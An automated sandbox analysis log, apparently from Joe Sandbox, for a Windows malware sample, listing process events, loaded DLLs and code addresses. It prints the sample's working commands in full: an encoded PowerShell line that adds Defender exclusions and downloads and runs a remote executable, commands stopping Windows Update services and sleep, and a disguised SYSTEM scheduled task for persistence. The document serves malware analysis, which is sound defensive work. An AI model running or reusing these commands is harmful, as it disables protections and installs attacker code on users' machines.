      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E89BC3037_2_000002824E89BC30
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B473D165838_2_0000021B473D1658
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B473CB23C38_2_0000021B473CB23C
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B473C20DC38_2_0000021B473C20DC
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B473CB03038_2_0000021B473CB030
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B473CF2F838_2_0000021B473CF2F8
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B47B4225838_2_0000021B47B42258
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B47B3BE3C38_2_0000021B47B3BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B47B32CDC38_2_0000021B47B32CDC
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B47B3BC3038_2_0000021B47B3BC30
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B47B3FEF838_2_0000021B47B3FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002086F9D20DC39_2_000002086F9D20DC
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002086F9DB03039_2_000002086F9DB030
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002086F9DF2F839_2_000002086F9DF2F8
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002086F9DB23C39_2_000002086F9DB23C
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002086F9E165839_2_000002086F9E1658
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002087006BE3C39_2_000002087006BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002087007225839_2_0000020870072258
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002087006FEF839_2_000002087006FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002087006BC3039_2_000002087006BC30
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_0000020870062CDC39_2_0000020870062CDC
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000017183BCF2F840_2_0000017183BCF2F8
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000017183BD165840_2_0000017183BD1658
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000017183BCB23C40_2_0000017183BCB23C
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000017183BC20DC40_2_0000017183BC20DC
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000017183BCB03040_2_0000017183BCB030
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_000001718426BC3040_2_000001718426BC30
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000017184262CDC40_2_0000017184262CDC
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_000001718426BE3C40_2_000001718426BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_000001718427225840_2_0000017184272258
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_000001718426FEF840_2_000001718426FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3F8165841_2_0000023FD3F81658
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3F7B23C41_2_0000023FD3F7B23C
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3F720DC41_2_0000023FD3F720DC
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3F7B03041_2_0000023FD3F7B030
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3F7F2F841_2_0000023FD3F7F2F8
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3FB225841_2_0000023FD3FB2258
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3FABE3C41_2_0000023FD3FABE3C
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3FA2CDC41_2_0000023FD3FA2CDC
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3FABC3041_2_0000023FD3FABC30
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3FAFEF841_2_0000023FD3FAFEF8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmp 4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
      Source: nhylsjsvllxf.tmp.4.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Source: updater.exe.4.drStatic PE information: Number of sections : 11 > 10
      Source: svc.exe.1.drStatic PE information: Number of sections : 11 > 10
      Source: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe, 00000000.00000002.1660092965.0000000000706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe
      Source: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
      Source: classification engineClassification label: mal100.adwa.spyw.evad.winEXE@38/76@2/3
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD412328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,16_2_00007FF6CD412328
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD411AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,16_2_00007FF6CD411AC4
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD412328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,16_2_00007FF6CD412328
      Source: C:\Users\user\AppData\Local\Temp\svc.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hctnl21w.wgh.ps1Jump to behavior
      Source: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeReversingLabs: Detection: 65%
      Source: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeVirustotal: Detection: 67%
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA="
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\svc.exe "C:\Users\user\AppData\Local\Temp\svc.exe"
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA="Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\svc.exe "C:\Users\user\AppData\Local\Temp\svc.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
